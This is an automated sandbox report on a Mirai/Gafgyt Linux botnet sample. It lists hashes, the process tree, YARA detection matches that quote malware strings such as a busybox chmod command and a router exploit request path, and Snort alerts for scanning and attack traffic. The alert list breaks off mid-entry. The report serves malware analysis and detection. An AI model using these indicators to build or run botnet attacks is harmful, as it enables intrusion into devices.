Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
yRo17s2Sbc

Overview

General Information

Sample Name:yRo17s2Sbc
Analysis ID:668938
MD5:526596631786f938addce6e0719e7945
SHA1:73fda12ac1457e83ed45a5bc912c6b4e566aafe4
SHA256:9b874bcda96b7115ffac92473dd594cfc540b2cc37427523ab105084a2131091
Tags:32armelfgafgyt
Infos:

Detection

Gafgyt, Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Contains symbols with names commonly found in malware
Sample tries to kill multiple processes (SIGKILL)
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Creates hidden files and/or directories
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:668938
Start date and time: 19/07/202213:06:092022-07-19 13:06:09 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:yRo17s2Sbc
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/yRo17s2Sbc
PID:6228
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • yRo17s2Sbc (PID: 6228, Parent: 6124, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/yRo17s2Sbc
  • wrapper-2.0 (PID: 6247, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6248, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6249, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6250, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
    • xfpm-power-backlight-helper (PID: 6272, Parent: 6250, MD5: 3d221ad23f28ca3259f599b1664e2427) Arguments: /usr/sbin/xfpm-power-backlight-helper --get-max-brightness
  • wrapper-2.0 (PID: 6251, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6252, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • xfconfd (PID: 6271, Parent: 6270, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
  • systemd New Fork (PID: 6280, Parent: 1860)
  • xfce4-notifyd (PID: 6280, Parent: 1860, MD5: eee956f1b227c1d5031f9c61223255d1) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
  • cleanup
SourceRuleDescriptionAuthorStrings
yRo17s2SbcSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x193b8:$xo1: Ik~mhhe+1*4
  • 0x19428:$xo1: Ik~mhhe+1*4
  • 0x19498:$xo1: Ik~mhhe+1*4
  • 0x19508:$xo1: Ik~mhhe+1*4
  • 0x19578:$xo1: Ik~mhhe+1*4
  • 0x197e8:$xo1: Ik~mhhe+1*4
  • 0x1983c:$xo1: Ik~mhhe+1*4
  • 0x19890:$xo1: Ik~mhhe+1*4
  • 0x198e4:$xo1: Ik~mhhe+1*4
  • 0x19938:$xo1: Ik~mhhe+1*4
yRo17s2SbcMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
  • 0x18b55:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x188b8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  • 0x18400:$s3: POST /cdn-cgi/
yRo17s2SbcMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x18400:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
yRo17s2SbcMAL_ARM_LNX_Mirai_Mar13_2022Detects new ARM Mirai variantMehmet Ali Kerimoglu a.k.a. CYB3RMX
  • 0x2510d:$attck1: attack.c
  • 0x251c0:$attck3: anti_gdb_entry
  • 0x251cf:$attck4: resolve_cnc_addr
  • 0x25ba3:$attck5: attack_gre_eth
  • 0x25bb7:$attck6: attack_udp_generic
  • 0x25ea6:$attck7: attack_get_opt_ip
yRo17s2SbcJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    Click to see the 2 entries
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6232.1.00007faa5c03a000.00007faa5c03f000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x3a30:$xo1: Ik~mhhe+1*4
      • 0x3aa8:$xo1: Ik~mhhe+1*4
      • 0x3b20:$xo1: Ik~mhhe+1*4
      • 0x3b98:$xo1: Ik~mhhe+1*4
      • 0x3c10:$xo1: Ik~mhhe+1*4
      • 0x3ea0:$xo1: Ik~mhhe+1*4
      • 0x3ef8:$xo1: Ik~mhhe+1*4
      • 0x3f50:$xo1: Ik~mhhe+1*4
      • 0x3fa8:$xo1: Ik~mhhe+1*4
      • 0x4000:$xo1: Ik~mhhe+1*4
      6228.1.00007faa5c03a000.00007faa5c03f000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x3a30:$xo1: Ik~mhhe+1*4
      • 0x3aa8:$xo1: Ik~mhhe+1*4
      • 0x3b20:$xo1: Ik~mhhe+1*4
      • 0x3b98:$xo1: Ik~mhhe+1*4
      • 0x3c10:$xo1: Ik~mhhe+1*4
      • 0x3ea0:$xo1: Ik~mhhe+1*4
      • 0x3ef8:$xo1: Ik~mhhe+1*4
      • 0x3f50:$xo1: Ik~mhhe+1*4
      • 0x3fa8:$xo1: Ik~mhhe+1*4
      • 0x4000:$xo1: Ik~mhhe+1*4
      6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x193b8:$xo1: Ik~mhhe+1*4
      • 0x19428:$xo1: Ik~mhhe+1*4
      • 0x19498:$xo1: Ik~mhhe+1*4
      • 0x19508:$xo1: Ik~mhhe+1*4
      • 0x19578:$xo1: Ik~mhhe+1*4
      • 0x197e8:$xo1: Ik~mhhe+1*4
      • 0x1983c:$xo1: Ik~mhhe+1*4
      • 0x19890:$xo1: Ik~mhhe+1*4
      • 0x198e4:$xo1: Ik~mhhe+1*4
      • 0x19938:$xo1: Ik~mhhe+1*4
      6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
      • 0x18b55:$x2: /bin/busybox chmod 777 * /tmp/
      • 0x188b8:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      • 0x18400:$s3: POST /cdn-cgi/
      6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0x18400:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
      Click to see the 11 entries
      Timestamp:192.168.2.23118.130.210.13933544802030092 07/19/22-13:07:55.608830
      SID:2030092
      Source Port:33544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.106.4945718372152835222 07/19/22-13:06:59.514191
      SID:2835222
      Source Port:45718
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23124.156.227.13735758802030092 07/19/22-13:07:44.149430
      SID:2030092
      Source Port:35758
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.28.10841668372152835222 07/19/22-13:08:05.833233
      SID:2835222
      Source Port:41668
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.247.18.13336720372152835222 07/19/22-13:08:47.401284
      SID:2835222
      Source Port:36720
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.164.90.10443486802030092 07/19/22-13:08:48.891412
      SID:2030092
      Source Port:43486
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.37.21.7854718802030092 07/19/22-13:07:00.558223
      SID:2030092
      Source Port:54718
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.112.11949594372152835222 07/19/22-13:08:43.529010
      SID:2835222
      Source Port:49594
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2320.141.100.18243996802030092 07/19/22-13:07:27.736652
      SID:2030092
      Source Port:43996
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23114.27.144.8441064802030092 07/19/22-13:07:41.858619
      SID:2030092
      Source Port:41064
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2331.44.91.360572802030092 07/19/22-13:07:52.848243
      SID:2030092
      Source Port:60572
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.120.139.10148802802030092 07/19/22-13:08:31.684325
      SID:2030092
      Source Port:48802
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23118.41.137.14852254802030092 07/19/22-13:08:20.644005
      SID:2030092
      Source Port:52254
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2331.24.151.25355512802030092 07/19/22-13:08:42.690759
      SID:2030092
      Source Port:55512
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.184.82.13635388802030092 07/19/22-13:07:41.610373
      SID:2030092
      Source Port:35388
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2384.130.168.19150230802030092 07/19/22-13:07:08.558579
      SID:2030092
      Source Port:50230
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.234.226.4853046372152835222 07/19/22-13:08:24.350819
      SID:2835222
      Source Port:53046
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2394.176.182.14745190802030092 07/19/22-13:08:56.518546
      SID:2030092
      Source Port:45190
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.192.162.7151150802030092 07/19/22-13:07:33.531656
      SID:2030092
      Source Port:51150
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.6.111.13346248802030092 07/19/22-13:08:26.953954
      SID:2030092
      Source Port:46248
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.118.16450222372152835222 07/19/22-13:08:30.111342
      SID:2835222
      Source Port:50222
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2313.35.133.14035620802030092 07/19/22-13:08:03.886302
      SID:2030092
      Source Port:35620
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.247.30.1535624372152835222 07/19/22-13:08:24.335825
      SID:2835222
      Source Port:35624
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23154.213.230.22846124802030092 07/19/22-13:07:33.229052
      SID:2030092
      Source Port:46124
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.86.158.8655656802030092 07/19/22-13:07:59.795285
      SID:2030092
      Source Port:55656
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.213.208.18839556802030092 07/19/22-13:07:37.409826
      SID:2030092
      Source Port:39556
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.69.0.6049404802030092 07/19/22-13:08:15.725977
      SID:2030092
      Source Port:49404
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.151.234.24057278802030092 07/19/22-13:08:56.586908
      SID:2030092
      Source Port:57278
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.48.14460448372152835222 07/19/22-13:08:28.843354
      SID:2835222
      Source Port:60448
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.235.251.129.20038954802030092 07/19/22-13:07:55.717013
      SID:2030092
      Source Port:38954
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.17.26.20245206802030092 07/19/22-13:07:39.105519
      SID:2030092
      Source Port:45206
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2396.7.157.11153078802030092 07/19/22-13:08:14.260648
      SID:2030092
      Source Port:53078
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23151.101.116.21358644802030092 07/19/22-13:07:30.728048
      SID:2030092
      Source Port:58644
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.36.81.21446576802030092 07/19/22-13:07:37.109529
      SID:2030092
      Source Port:46576
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.201.167.17544326802030092 07/19/22-13:07:25.643844
      SID:2030092
      Source Port:44326
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.47.78.7833472802030092 07/19/22-13:08:03.721728
      SID:2030092
      Source Port:33472
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.147.98.2649404802030092 07/19/22-13:08:37.248969
      SID:2030092
      Source Port:49404
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23198.178.167.19758590802030092 07/19/22-13:07:22.092403
      SID:2030092
      Source Port:58590
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23106.248.230.8345628802030092 07/19/22-13:08:06.147760
      SID:2030092
      Source Port:45628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.133.6232968372152835222 07/19/22-13:07:27.792208
      SID:2835222
      Source Port:32968
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2331.149.101.22646680802030092 07/19/22-13:08:34.851527
      SID:2030092
      Source Port:46680
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.28.146.13744142802030092 07/19/22-13:07:21.922739
      SID:2030092
      Source Port:44142
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.14.165.22353716802030092 07/19/22-13:07:37.105494
      SID:2030092
      Source Port:53716
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.115.245.17950884802030092 07/19/22-13:07:53.080025
      SID:2030092
      Source Port:50884
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.112.23054042372152835222 07/19/22-13:08:26.214927
      SID:2835222
      Source Port:54042
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2378.47.166.16151538802030092 07/19/22-13:08:12.554135
      SID:2030092
      Source Port:51538
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23199.232.173.21256438802030092 07/19/22-13:07:37.071014
      SID:2030092
      Source Port:56438
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.32.162.18455910802030092 07/19/22-13:08:59.349046
      SID:2030092
      Source Port:55910
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.8.139.8454842802030092 07/19/22-13:08:54.126894
      SID:2030092
      Source Port:54842
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23181.48.125.22839268802030092 07/19/22-13:08:48.535495
      SID:2030092
      Source Port:39268
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.17.87.7634470802030092 07/19/22-13:08:41.556549
      SID:2030092
      Source Port:34470
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23144.208.124.25050304802030092 07/19/22-13:07:22.539422
      SID:2030092
      Source Port:50304
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.195.111.5156598802030092 07/19/22-13:08:31.667349
      SID:2030092
      Source Port:56598
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.166.224.6650566802030092 07/19/22-13:08:41.580135
      SID:2030092
      Source Port:50566
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.10.58.19759338802030092 07/19/22-13:08:14.197036
      SID:2030092
      Source Port:59338
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.139.16.7638290802030092 07/19/22-13:08:42.595768
      SID:2030092
      Source Port:38290
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23180.70.9.6847346802030092 07/19/22-13:07:00.909625
      SID:2030092
      Source Port:47346
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23144.76.38.2240024802030092 07/19/22-13:07:21.780294
      SID:2030092
      Source Port:40024
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.44.36.20056710802030092 07/19/22-13:07:08.485188
      SID:2030092
      Source Port:56710
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23161.10.233.1734028802030092 07/19/22-13:07:27.822385
      SID:2030092
      Source Port:34028
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2377.136.140.840320802030092 07/19/22-13:08:52.555643
      SID:2030092
      Source Port:40320
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.15.175.21047688802030092 07/19/22-13:07:25.069564
      SID:2030092
      Source Port:47688
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.192.239.15838080802030092 07/19/22-13:07:37.055238
      SID:2030092
      Source Port:38080
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.251.156.9952512802030092 07/19/22-13:07:33.593583
      SID:2030092
      Source Port:52512
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2392.122.27.11540830802030092 07/19/22-13:08:20.382748
      SID:2030092
      Source Port:40830
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.26.163.2355444802030092 07/19/22-13:07:00.880942
      SID:2030092
      Source Port:55444
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.52.215.11557956802030092 07/19/22-13:08:05.728287
      SID:2030092
      Source Port:57956
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23193.220.127.5356268802030092 07/19/22-13:07:00.605849
      SID:2030092
      Source Port:56268
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.247.34.1457828802030092 07/19/22-13:08:56.820062
      SID:2030092
      Source Port:57828
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.103.53.1335940802030092 07/19/22-13:07:26.214079
      SID:2030092
      Source Port:35940
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.91.6960262372152835222 07/19/22-13:07:49.774086
      SID:2835222
      Source Port:60262
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.254.49.25448104372152835222 07/19/22-13:08:16.776869
      SID:2835222
      Source Port:48104
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.250.94.10955242372152835222 07/19/22-13:07:19.994562
      SID:2835222
      Source Port:55242
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2338.90.8.18957526802030092 07/19/22-13:07:58.511934
      SID:2030092
      Source Port:57526
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.220.172.8251212802030092 07/19/22-13:07:59.823848
      SID:2030092
      Source Port:51212
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.190.42.7747628802030092 07/19/22-13:07:30.307743
      SID:2030092
      Source Port:47628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.247.23.24950614372152835222 07/19/22-13:08:50.224476
      SID:2835222
      Source Port:50614
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23178.63.54.7846900802030092 07/19/22-13:08:51.897530
      SID:2030092
      Source Port:46900
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23144.96.231.2940940802030092 07/19/22-13:08:41.842945
      SID:2030092
      Source Port:40940
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.135.23235426372152835222 07/19/22-13:07:46.046452
      SID:2835222
      Source Port:35426
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23220.88.163.6953740802030092 07/19/22-13:07:51.432612
      SID:2030092
      Source Port:53740
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2386.69.169.18840152802030092 07/19/22-13:07:31.961948
      SID:2030092
      Source Port:40152
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2374.206.170.15347258802030092 07/19/22-13:07:33.351134
      SID:2030092
      Source Port:47258
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23183.105.112.8456214802030092 07/19/22-13:08:46.032944
      SID:2030092
      Source Port:56214
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.88.158.551352802030092 07/19/22-13:07:47.209061
      SID:2030092
      Source Port:51352
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23110.9.137.13033112802030092 07/19/22-13:08:42.840280
      SID:2030092
      Source Port:33112
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.235.96.160060372152835222 07/19/22-13:08:20.563735
      SID:2835222
      Source Port:60060
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2345.194.179.11734842802030092 07/19/22-13:07:59.728596
      SID:2030092
      Source Port:34842
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23165.192.136.14034986802030092 07/19/22-13:07:55.987412
      SID:2030092
      Source Port:34986
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.244.212.9253770802030092 07/19/22-13:08:20.663875
      SID:2030092
      Source Port:53770
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2392.122.46.13847094802030092 07/19/22-13:08:48.375434
      SID:2030092
      Source Port:47094
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.51.50.19458316802030092 07/19/22-13:07:30.507400
      SID:2030092
      Source Port:58316
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2372.163.219.24454922802030092 07/19/22-13:07:33.512841
      SID:2030092
      Source Port:54922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2388.221.24.16059816802030092 07/19/22-13:07:46.919794
      SID:2030092
      Source Port:59816
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.230.81.8443684802030092 07/19/22-13:08:23.422462
      SID:2030092
      Source Port:43684
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2395.216.181.15842404802030092 07/19/22-13:08:22.145927
      SID:2030092
      Source Port:42404
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23190.55.55.2258046802030092 07/19/22-13:08:34.945965
      SID:2030092
      Source Port:58046
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23151.236.58.12657470802030092 07/19/22-13:07:30.219313
      SID:2030092
      Source Port:57470
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.126.206.3934428802030092 07/19/22-13:07:47.225301
      SID:2030092
      Source Port:34428
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23145.118.2.6753276802030092 07/19/22-13:08:31.675041
      SID:2030092
      Source Port:53276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.149.247.18948492802030092 07/19/22-13:07:13.816678
      SID:2030092
      Source Port:48492
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.87.113.5956352802030092 07/19/22-13:08:52.200952
      SID:2030092
      Source Port:56352
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.215.65.12937296802030092 07/19/22-13:08:59.355533
      SID:2030092
      Source Port:37296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.165.152.4336414802030092 07/19/22-13:08:08.823771
      SID:2030092
      Source Port:36414
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23181.49.134.20954552802030092 07/19/22-13:07:51.009888
      SID:2030092
      Source Port:54552
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.235.98.17649880372152835222 07/19/22-13:08:25.765751
      SID:2835222
      Source Port:49880
